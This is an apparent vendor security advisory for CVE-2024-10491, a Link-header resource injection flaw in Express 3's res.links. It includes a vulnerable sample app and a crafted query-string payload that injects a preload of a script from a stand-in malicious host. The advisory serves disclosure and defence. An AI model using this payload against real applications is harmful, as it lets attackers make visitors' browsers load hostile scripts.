Connect with sales  +1 877-586-1965

By clicking "Accept", you agree to the storing of cookies on your device to enhance site navigation, analyze site usage, and assist in our marketing efforts. View our Privacy Policy for more information.

PreferencesRejectAccept
Manage Consent Preferences by Category
Essentials
Always active

Necessary for the site to function. Always On.

Used for targeted advertising.

Remembers your preferences and provides enhanced features.

Measures usage and improves your experience.

Reject AllAccept All
Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.
View all Vulnerabilities

CVE-2024-10491

Resource Injection
Affects
Express
>=3.0.0-alpha1 <=3.21.2
in
Express
No items found.
Exclamation circle icon
Patch Available
This Vulnerability has been fixed in the Never-Ending Support (NES) version offered by HeroDevs
View NES Solution

Overview

Express is a minimal and flexible Node.js web application framework that provides a robust set of features for web and mobile applications.

A Resource Injection vulnerability (CVE-2024-10491) has been identified in the Express response.links function, allowing for arbitrary resource injection in the Link header when unsanitized data is used. The issue arises from improper sanitization in Link header values, which can allow a combination of characters like ,, ;, and <> to preload malicious resources. This vulnerability is especially relevant for dynamic parameters.

Per MITRE: Resource Injection happens when the application receives input from an upstream component, but it does not restrict or incorrectly restricts the input before it is used as an identifier for a resource that may be outside the intended sphere of control.

This issue affects Express versions 3.0.0-alpha1 to 3.21.2.

Details

Module Info

Steps To Reproduce

  • Create an Express application and configure res.links to set value from query param:
var express = require('express');
var app = express();

app.get('/', function (req, res) {
  res.links({preload: req.query.resource});
  res.send('ok');
});
  
app.listen(3000);

  • Use a specially-crafted payload to set multiple links header. For example:
// note how the query param uses < > to load arbitrary resource
const maliciousQueryParam = '?resource=http://api.example.com/users?resource=>; rel="preload", <http://api.malicious.com/1.js>; rel="preload"; as="script", <http:/api.example.com';

const url = `http://localhost:3000/${maliciousQueryParam}`;
fetch(url);

  • We can note how multiple headers have been set:
<http://api.example.com/users?resource=>; rel="preload", <http://api.malicious.com/1.js>; rel="preload"; as="script", <http:/api.example.com>; rel="preload"

Proof Of Concept

A full reproduction with code similar to the above can be found here:

Express resource injection vulnerability POC

Credits

  • Abze (finder)

Mitigation

Express 3 has reached End-of-Life and will not receive any updates to address this issue. For more information see here.

Users of the affected components should apply one of the following mitigations:

  • Migrate affected applications away from Express 3.
  • Leverage a commercial support partner like HeroDevs for post-EOL security support.
Pink arrow
Pink arrow
CVE-2024-43796
CVE-2024-9266
HD-2024-1410
CVE-2024-10491
What is a HeroDevs Security Advisory?
Vulnerability Details
ID
CVE-2024-10491
PROJECT Affected
Express
Versions Affected
>=3.0.0-alpha1 <=3.21.2
Published date
October 29, 2024
≈ Fix date
October 29, 2024
Fixed in
Express NES
Severity
Medium
Category
Resource Injection